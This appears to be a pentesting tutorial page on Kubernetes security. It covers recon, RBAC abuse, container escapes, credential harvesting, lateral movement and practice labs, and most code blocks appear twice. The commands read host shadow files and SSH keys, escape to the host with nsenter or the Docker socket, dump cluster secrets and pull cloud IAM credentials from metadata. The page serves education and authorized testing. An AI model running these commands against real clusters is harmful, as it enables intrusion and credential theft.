Container Security

Kubernetes Security Testing

Container orchestration security assessment covering cluster misconfigurations, RBAC exploitation, pod escapes, and lateral movement in Kubernetes environments.

Authorization Required

Only test Kubernetes clusters you own or have explicit written authorization to test. Unauthorized access to cloud infrastructure is a federal crime.

Kubernetes Attack Flow

flowchart LR R["🔍 Recon Port Scan 6443/10250"] --> IA["🚪 Initial Access Exposed API SSRF/Kubelet"] IA --> E["📋 Enumerate RBAC / Secrets Namespaces"] E --> PE["⬆️ Priv Esc Privileged Pod RBAC Abuse"] PE --> ESC["💥 Pod Escape Mount Host nsenter"] ESC --> LM["↔️ Lateral Move Pod Hopping Service Mesh"] LM --> EX["📤 Exfiltrate Secrets Dump Cloud Metadata"]

Reconnaissance

Container Detection

bash

# Check if running inside a container
cat /proc/1/cgroup
ls -la /.dockerenv

# Service account token location
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace

# Environment variables
env | grep -i kube
# Check if running inside a container
cat /proc/1/cgroup
ls -la /.dockerenv

# Service account token location
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace

# Environment variables
env | grep -i kube

API Server Access

bash

# Set up API access from inside pod
APISERVER=https://kubernetes.default.svc
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Test API access
curl --cacert $CACERT --header "Authorization: Bearer $TOKEN" $APISERVER/api/

# List pods in current namespace
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
curl --cacert $CACERT --header "Authorization: Bearer $TOKEN" $APISERVER/api/v1/namespaces/$NAMESPACE/pods
# Set up API access from inside pod
APISERVER=https://kubernetes.default.svc
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Test API access
curl --cacert $CACERT --header "Authorization: Bearer $TOKEN" $APISERVER/api/

# List pods in current namespace
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
curl --cacert $CACERT --header "Authorization: Bearer $TOKEN" $APISERVER/api/v1/namespaces/$NAMESPACE/pods

External Enumeration

bash

# Scan for exposed API servers
nmap -p 6443,8443,10250,10255 -sV target.com

# Common K8s ports:
# 6443  - API Server (secure)
# 10250 - Kubelet API (secure)
# 10255 - Kubelet read-only
# 2379  - etcd

# Test unauthenticated kubelet API
curl -k https://target.com:10250/pods/
# Scan for exposed API servers
nmap -p 6443,8443,10250,10255 -sV target.com

# Common K8s ports:
# 6443  - API Server (secure)
# 10250 - Kubelet API (secure)
# 10255 - Kubelet read-only
# 2379  - etcd

# Test unauthenticated kubelet API
curl -k https://target.com:10250/pods/

RBAC Exploitation

Permission Enumeration

bash

# Check current permissions
kubectl auth can-i --list

# Check specific permissions
kubectl auth can-i create pods
kubectl auth can-i get secrets
kubectl auth can-i create deployments

# List service accounts
kubectl get serviceaccounts --all-namespaces

# List roles and bindings
kubectl get roles --all-namespaces
kubectl get clusterroles
# Check current permissions
kubectl auth can-i --list

# Check specific permissions
kubectl auth can-i create pods
kubectl auth can-i get secrets
kubectl auth can-i create deployments

# List service accounts
kubectl get serviceaccounts --all-namespaces

# List roles and bindings
kubectl get roles --all-namespaces
kubectl get clusterroles

Dangerous RBAC Permissions

Permission	Risk	Exploitation Path
create pods	High	Spawn privileged pod
get secrets	Critical	Access credentials, tokens
exec pods	High	Command execution
create rolebindings	Critical	Privilege escalation

Pod Escape Techniques

Privileged Container Escape

bash

# Check if running as privileged
cat /proc/self/status | grep CapEff
# CapEff: 0000003fffffffff = privileged

# Mount host filesystem
mkdir /mnt/host
mount /dev/sda1 /mnt/host

# Access host files
cat /mnt/host/etc/shadow
cat /mnt/host/root/.ssh/id_rsa

# Escape to host via nsenter
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
# Check if running as privileged
cat /proc/self/status | grep CapEff
# CapEff: 0000003fffffffff = privileged

# Mount host filesystem
mkdir /mnt/host
mount /dev/sda1 /mnt/host

# Access host files
cat /mnt/host/etc/shadow
cat /mnt/host/root/.ssh/id_rsa

# Escape to host via nsenter
nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Host PID Namespace Escape

bash

# If hostPID: true is set
ps aux  # See host processes

# Inject into host process
cat /proc/1/root/etc/shadow

# Access host filesystem via /proc
ls -la /proc/1/root/

# Copy files from host
cp /proc/1/root/etc/passwd /tmp/passwd
# If hostPID: true is set
ps aux  # See host processes

# Inject into host process
cat /proc/1/root/etc/shadow

# Access host filesystem via /proc
ls -la /proc/1/root/

# Copy files from host
cp /proc/1/root/etc/passwd /tmp/passwd

Docker Socket Escape

bash

# Check for mounted Docker socket
ls -la /var/run/docker.sock

# If present, spawn privileged container
docker run -it --privileged --pid=host --net=host -v /:/host alpine chroot /host
# Check for mounted Docker socket
ls -la /var/run/docker.sock

# If present, spawn privileged container
docker run -it --privileged --pid=host --net=host -v /:/host alpine chroot /host

Credential Harvesting

Secret Extraction

bash

# List all secrets
kubectl get secrets --all-namespaces

# Decode secret
kubectl get secret mysecret -o jsonpath='{.data.password}' | base64 -d

# Get all secrets in JSON
kubectl get secrets -o json

# Search for cloud credentials
kubectl get secrets --all-namespaces -o json | grep -i aws
# List all secrets
kubectl get secrets --all-namespaces

# Decode secret
kubectl get secret mysecret -o jsonpath='{.data.password}' | base64 -d

# Get all secrets in JSON
kubectl get secrets -o json

# Search for cloud credentials
kubectl get secrets --all-namespaces -o json | grep -i aws

Cloud Metadata Service

bash

# AWS IMDS (if not blocked)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Azure IMDS
curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

# GCP Metadata
curl -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/
# AWS IMDS (if not blocked)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Azure IMDS
curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

# GCP Metadata
curl -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/

Lateral Movement

bash

# List all pods with IPs
kubectl get pods --all-namespaces -o wide

# Exec into another pod
kubectl exec -it target-pod -- /bin/bash

# Port forward to service
kubectl port-forward service/database 5432:5432

# Access internal services
curl http://internal-service.namespace.svc.cluster.local
# List all pods with IPs
kubectl get pods --all-namespaces -o wide

# Exec into another pod
kubectl exec -it target-pod -- /bin/bash

# Port forward to service
kubectl port-forward service/database 5432:5432

# Access internal services
curl http://internal-service.namespace.svc.cluster.local

Common Misconfigurations

Anonymous API Access

bash

# Test anonymous access
curl -k https://API_SERVER:6443/api/
# Should return 403, not 200
# Test anonymous access
curl -k https://API_SERVER:6443/api/
# Should return 403, not 200

Exposed Kubelet

bash

# Anonymous kubelet
curl -k https://NODE:10250/pods/
# Anonymous kubelet
curl -k https://NODE:10250/pods/

Exposed etcd

bash

# Unauthenticated etcd
etcdctl --endpoints=http://ETCD:2379 get / --prefix --keys-only
# Unauthenticated etcd
etcdctl --endpoints=http://ETCD:2379 get / --prefix --keys-only

Default Namespace Usage

bash

# All workloads in default namespace
kubectl get all -n default
# All workloads in default namespace
kubectl get all -n default

Tools

kube-hunter

Hunt for security weaknesses in K8s clusters.

bash

pip install kube-hunter
kube-hunter --remote CLUSTER_IP
pip install kube-hunter
kube-hunter --remote CLUSTER_IP

kubeaudit

Audit K8s clusters for security concerns.

bash

brew install kubeaudit
kubeaudit all
brew install kubeaudit
kubeaudit all

peirates

K8s penetration testing tool.

bash

go install github.com/inguardians/peirates@latest
go install github.com/inguardians/peirates@latest

kubeletctl

Interact with kubelet API.

bash

go install github.com/cyberark/kubeletctl@latest
go install github.com/cyberark/kubeletctl@latest

bash

# Trivy - Container vulnerability scanner
trivy image nginx:latest
trivy k8s --report=summary

# rbac-tool - RBAC visualization
kubectl rbac-tool viz --outformat dot

# kubectl-who-can
kubectl who-can create pods
kubectl who-can get secrets
# Trivy - Container vulnerability scanner
trivy image nginx:latest
trivy k8s --report=summary

# rbac-tool - RBAC visualization
kubectl rbac-tool viz --outformat dot

# kubectl-who-can
kubectl who-can create pods
kubectl who-can get secrets

Kubernetes Security Labs

Hands-on practice with Kubernetes attack techniques.

RBAC Exploitation & Secret Extraction Custom Lab medium

Deploy a Kubernetes cluster with intentionally weak RBAC (minikube or kind)From inside a pod, enumerate permissions with 'kubectl auth can-i --list'Discover and extract secrets from all namespacesExploit create-pods permission to spawn a privileged containerUse the privileged pod to access the host filesystem and steal kubeconfigRun kube-hunter from outside the cluster to compare findings

Container Escape & Host Compromise Custom Lab hard

Deploy a pod with 'privileged: true' security contextDetect privilege level using CapEff in /proc/self/statusEscape via host mount (mount /dev/sda1) and nsenter into PID 1From the host, access the kubelet credentials and API serverPivot to other pods and namespaces using stolen credentialsImplement Pod Security Standards (Restricted) and verify the escape is blocked

Exposed API Server & Kubelet Exploitation Custom Lab medium

Scan for exposed Kubernetes ports (6443, 10250, 10255, 2379)Test anonymous API access and unauthenticated kubelet endpointsUse kubeletctl to interact with the exposed kubelet APITest etcd direct access for secret extractionRun kubeaudit to generate a comprehensive security report

Need help setting up? Check our Lab Setup Guide →

Kubernetes Security Testing

Reconnaissance

Container Detection

API Server Access

External Enumeration

RBAC Exploitation

Permission Enumeration

Dangerous RBAC Permissions

Pod Escape Techniques

Privileged Container Escape

Host PID Namespace Escape

Docker Socket Escape

Credential Harvesting

Secret Extraction

Cloud Metadata Service

Lateral Movement

Common Misconfigurations

Anonymous API Access

Exposed Kubelet

Exposed etcd

Default Namespace Usage

Tools

kube-hunter

kubeaudit

peirates

kubeletctl

Kubernetes Security Labs

Related Topics

← Back to Cloud Pentesting

Docker Security

AWS Pentesting

GCP Pentesting

Related Tools

Google Dork Builder

JWT Decoder

Findings Library

Playbook Builder